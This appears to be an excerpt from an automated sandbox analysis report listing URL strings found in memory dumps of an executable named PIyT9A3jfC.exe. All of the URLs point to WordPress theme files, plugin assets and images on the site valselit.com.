                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/feed
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/immobilier
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/page/4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.5
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-1024x682.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-300x200.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595564444.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.596668740.0000000004000000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-768x512.jpg
                  Source: PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527.jpg
